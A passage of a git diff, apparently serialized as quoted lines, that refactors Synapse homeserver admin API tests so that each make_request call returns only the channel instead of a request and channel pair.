self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", + "@@ -140,3 +140,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", + " url = \"events?timeout=0&room_id=\" + room_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", + "@@ -186,3 +186,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", self.url, json.dumps({}), access_token=self.other_user_tok,", + "@@ -199,3 +199,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url, json.dumps({}), access_token=self.admin_user_tok,", + "@@ -212,3 +212,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url, json.dumps({}), access_token=self.admin_user_tok,", + "@@ -227,3 +227,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -246,3 +246,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -264,3 +264,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -280,3 +280,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -306,3 +306,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -339,3 +339,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -373,3 +373,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -420,3 +420,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s/delete\" % self.room_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -450,3 +450,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + " url = \"rooms/%s/state/m.room.history_visibility\" % (self.room_id,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -467,3 +467,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s/delete\" % self.room_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -532,3 +532,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + " url = \"rooms/%s/initialSync\" % (room_id,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", + "@@ -540,3 +540,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", + " url = \"events?timeout=0&room_id=\" + room_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", + "@@ -571,3 +571,3 @@ class PurgeRoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/purge_room\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -625,3 +625,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -706,3 +706,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -746,3 +746,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms?from=%d&limit=%d\" % (start, limit)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -766,3 +766,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_matrix/client/r0/directory/room/%s\" % (urllib.parse.quote(test_alias),)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -796,3 +796,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -837,3 +837,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -877,3 +877,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url += \"&dir=b\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1013,3 +1013,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms?search_term=%s\" % (search_term,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1074,3 +1074,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1104,3 +1104,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1116,3 +1116,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1126,3 +1126,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1155,3 +1155,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s/members\" % (room_id_1,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1166,3 +1166,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/rooms/%s/members\" % (room_id_2,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "@@ -1206,3 +1206,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1222,3 +1222,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1238,3 +1238,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1254,3 +1254,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1274,3 +1274,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1291,3 +1291,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1310,3 +1310,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1322,3 +1322,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.second_tok,", + "@@ -1339,3 +1339,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1369,3 +1369,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.admin_user_tok,", + "@@ -1380,3 +1380,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1391,3 +1391,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.second_tok,", + "@@ -1408,3 +1408,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1420,3 +1420,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.second_tok,", + "diff --git a/tests/rest/admin/test_statistics.py b/tests/rest/admin/test_statistics.py", + "index 907b49f88..73f8a8ec9 100644", + "--- a/tests/rest/admin/test_statistics.py", + "+++ b/tests/rest/admin/test_statistics.py", + "@@ -48,3 +48,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -57,3 +57,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url, json.dumps({}), access_token=self.other_user_tok,", + "@@ -69,3 +69,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # unkown order_by", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?order_by=bar\", access_token=self.admin_user_tok,", + "@@ -77,3 +77,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # negative from", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=-5\", access_token=self.admin_user_tok,", + "@@ -85,3 +85,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # negative limit", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=-5\", access_token=self.admin_user_tok,", + "@@ -93,3 +93,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # negative from_ts", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from_ts=-1234\", access_token=self.admin_user_tok,", + "@@ -101,3 +101,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # negative until_ts", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?until_ts=-1234\", access_token=self.admin_user_tok,", + "@@ -109,3 +109,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # until_ts smaller from_ts", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -119,3 +119,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # empty search term", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?search_term=\", access_token=self.admin_user_tok,", + "@@ -127,3 +127,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # invalid search order", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?dir=bar\", access_token=self.admin_user_tok,", + "@@ -140,3 +140,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=5\", access_token=self.admin_user_tok,", + "@@ -156,3 +156,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=5\", access_token=self.admin_user_tok,", + "@@ -172,3 +172,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=5&limit=10\", access_token=self.admin_user_tok,", + "@@ -192,3 +192,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # Number of results is the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=20\", access_token=self.admin_user_tok,", + "@@ -203,3 +203,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # Number of max results is larger than the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=21\", access_token=self.admin_user_tok,", + "@@ -214,3 +214,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # Number of max results is smaller than the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=19\", access_token=self.admin_user_tok,", + "@@ -225,3 +225,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # Check `next_token` does not appear", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=19\", access_token=self.admin_user_tok,", + "@@ -240,5 +240,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -318,5 +316,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # list all media when filter is not set", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -326,3 +322,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # result is 0", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from_ts=%s\" % (ts1,), access_token=self.admin_user_tok,", + "@@ -339,3 +335,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # filter media between `ts1` and `ts2`", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -348,3 +344,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # filter media until `ts2` and earlier", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?until_ts=%s\" % (ts2,), access_token=self.admin_user_tok,", + "@@ -358,5 +354,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # check without filter get all users", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -365,3 +359,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # filter user 1 and 10-19 by `user_id`", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -374,3 +368,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # filter on this user in `displayname`", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -384,3 +378,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " # filter and get empty result", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?search_term=foobar\", access_token=self.admin_user_tok,", + "@@ -449,3 +443,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", + " url += \"&dir=%s\" % (dir,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", + "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", + "index ba1438cdc..582f98322 100644", + "--- a/tests/rest/admin/test_user.py", + "+++ b/tests/rest/admin/test_user.py", + "@@ -72,3 +72,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", + "@@ -89,3 +89,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + "@@ -98,3 +98,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -105,3 +105,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -113,3 +113,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -122,3 +122,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -138,3 +138,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -148,3 +148,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -167,3 +167,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -176,3 +176,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -192,3 +192,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -198,3 +198,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " # Now, try and reuse it", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -211,3 +211,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " def nonce():", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " return channel.json_body[\"nonce\"]", + "@@ -220,3 +220,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -231,3 +231,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce()})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -238,3 +238,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": 1234})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -245,3 +245,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": \"abcd\\u0000\"})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -252,3 +252,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\" * 1000})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -263,3 +263,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\"})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -270,3 +270,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\", \"password\": 1234})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -277,3 +277,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\", \"password\": \"abcd\\u0000\"})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -284,3 +284,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\", \"password\": \"A\" * 1000})", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -302,3 +302,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -313,3 +313,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " # set no displayname", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -323,3 +323,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -328,3 +328,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", \"/profile/@bob1:test/displayname\")", + "+ channel = self.make_request(\"GET\", \"/profile/@bob1:test/displayname\")", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -333,3 +333,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " # displayname is None", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -349,3 +349,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -354,3 +354,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", \"/profile/@bob2:test/displayname\")", + "+ channel = self.make_request(\"GET\", \"/profile/@bob2:test/displayname\")", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -359,3 +359,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " # displayname is empty", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -375,3 +375,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -380,3 +380,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", \"/profile/@bob3:test/displayname\")", + "+ channel = self.make_request(\"GET\", \"/profile/@bob3:test/displayname\")", + " self.assertEqual(404, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -384,3 +384,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " # set displayname", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -400,3 +400,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -405,3 +405,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", \"/profile/@bob4:test/displayname\")", + "+ channel = self.make_request(\"GET\", \"/profile/@bob4:test/displayname\")", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -431,3 +431,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " # Register new user with admin API", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " nonce = channel.json_body[\"nonce\"]", + "@@ -450,3 +450,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", + "@@ -475,3 +475,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -484,3 +484,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -522,5 +522,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.other_user_token,)", + "@@ -529,3 +527,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url, access_token=self.other_user_token, content=b\"{}\",", + "@@ -541,3 +539,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -567,3 +565,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -583,5 +581,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -614,3 +610,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -630,5 +626,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -658,5 +652,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # before limit of monthly active users is reached", + "- request, channel = self.make_request(", + "- \"GET\", \"/sync\", access_token=self.admin_user_tok", + "- )", + "+ channel = self.make_request(\"GET\", \"/sync\", access_token=self.admin_user_tok)", + "@@ -683,3 +675,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -722,3 +714,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ 